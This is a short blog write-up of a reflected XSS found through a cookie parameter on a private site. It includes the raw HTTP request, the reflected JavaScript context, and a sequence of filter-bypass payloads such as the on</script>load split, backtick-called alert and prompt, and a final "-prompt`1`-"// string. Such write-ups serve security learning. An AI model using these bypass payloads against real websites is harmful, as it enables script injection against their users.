XSS “403 forbidden” bypass write up

Nur A Alam Dipu
Apr 25, 2018 · 3 min read

Hello,

This is my second blog post and first write up about xss. I think there is no new things here that you can learn. If you see “akita” or “rahul-maini” blog you can learn more than this. This is just a part of learning from those wite up post.

Okay lets start.

Recent I found a cookie injection in a private site that is reflected something in a cookie parameter.

In regular way I check all the parameter, input something like “xxxx”. I noticed in burp reapeater cookie “GA_countryCode=xxx” reflected in code function.

GET /my/refer/welcome?rt=6bjzl0zEmBiPl0IQRSeN&cid=111&channel=1151 HTTP/1.1
Host: www.vuln.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Cookie: RT=6bjzl0zEmBiPl0IQRSeN5wxxx; GA_countryCode=GBxxxxxx”; GA_currentDomain=www.vuln.co.uk; feature_rollercoaster_upload=0; ABTasty=uid%3D18042509351658083%26fst%3D1524627317406%26pst%3Dnull%26cst%3D1524627317406%26ns%3D1%26pvt%3D1%26pvis%3D1%26th%3D;

‘session_status’ : “session_defined”,
‘page_name’ : pageName,
‘page_category’ : ‘My Account’,
‘country_code’ : “GBxxxxxx”,
‘ua’ : “UA-48172145–1”,
‘current_domain’ : window.location.host,
‘Cookie_Timeout’ : “2592000000”,
‘channel_id’ : “1151”,

Then I checked “><svg/onload> and its also reflected.

page_name’ : pageName,
‘page_category’ : ‘My Account’,
‘country_code’ : “GB”><svg/onload>”,
‘ua’ : “UA-48172145–1”,
‘current_domain’ : window.location.host,
‘Cookie_Timeout’ : “2592000000”,
‘channel_id’ : “1151”

Now the problem is comes up, when I try “><svg/onload=>, “=” blocked.

Then I used some technique that I learned from brutelogic blog. I noticed alert is okay, no blocked only “=” is blocked. Then I used playload Like “><svg/on</script>laod=alert> and saw that was bypassed and reflected.

Then try with “><svg/on</script>load=alert(1)> “()” bracket blocked, then used ``. “><svg/on</script>load=alert`1`> its fine.

But no pop up. As all are bypassed, so I was confirmed its possible to trigger xss. I try many other way to pop up, but failed. Because many restiction, “Access Denied HTTP/1.1 403 Forbidden” and ip blocked.

Then I make a shortcut playload Like “-prompt`1`-”//. And it worked. :)

Xss done!!

For this simple playload, it takes a long time. :(

For sure there was a possible way to bypass with normal playload, but i didn’t try more. Less knowledge can’t think more.

Sorry for my bad English.

Thanks for reading.

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store